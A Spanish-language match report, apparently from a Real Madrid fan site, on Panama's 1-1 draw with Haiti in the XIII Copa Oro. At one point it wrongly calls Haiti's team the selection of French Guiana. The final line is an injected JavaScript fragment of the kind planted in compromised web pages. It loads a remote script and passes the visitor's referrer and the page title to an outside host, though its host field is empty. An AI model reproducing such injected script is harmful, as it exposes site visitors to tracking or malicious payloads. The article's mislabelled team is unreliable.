La Crónica: Kelia Vidarte/LaTribunaMadridista.com ( Copa Oro – Fase de grupos) Panamá 1 vs Haití 1
La apertura de la XIII Copa Oro estuvo llena de sorpresas, una selección valiente y decidida de Haití consiguió empatar con Panamá en el Toyota Stadium de Dallas, quedando un resultado de tablas 1-1.
Los hombres de Hernán Darío Gómez trataron de imponer un fútbol con abundantes pases cortos, posesión del balón, control de medio campo y una mezcla de habilidad individual con rapidez y fuerza en el ataque. No obstante este juego no fue efectivo porque se encontraron ante una selección de la Guayana Francesa, lideradas por el entrenador de Marc Collat que sacó a relucir una estrategia férrea, defensa, velocidad, contragolpe y con sorpresa.
Esta presión se vio en que el primer gol de Panamá no se registró hasta el minuto 55. En un error fatal del defensor lateral Reginald Goreux, dejó el balón a expensas del mediocampista Alberto Quintero, que aprovechó el regalo y remató fuerte, directo y preciso para vencer al portero Johnny Placide.
El empate llegó al minuto 86, de la mano del mediocampista Sony Nord, que aprovechó un fallo de Panamá, con una defensa desordenada y remató de forma contundente, superando a Penedo.
Con un dominio que ejerció desde los minutos iniciales del partido, a Panamá le costó perforar la portería y muralla de Placide durante la primera mitad del encuentro.
En el periodo complementario, y con individualidades, Haití intentó asustar a Penedo, pero sin éxito. La fuerte defensa panameña siempre se impuso y controló el juego, para mantener el asedio sobre Placide. Sin embargo, Haití respondió y se encontró, de manera repetida, con la sólida Panamá, hasta lograr romperla. Las ofensivas se repitieron hacia una y otra portería, pero el empate ya estaba sentenciado en el estreno de la Copa Oro.
s.src=’http:///?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;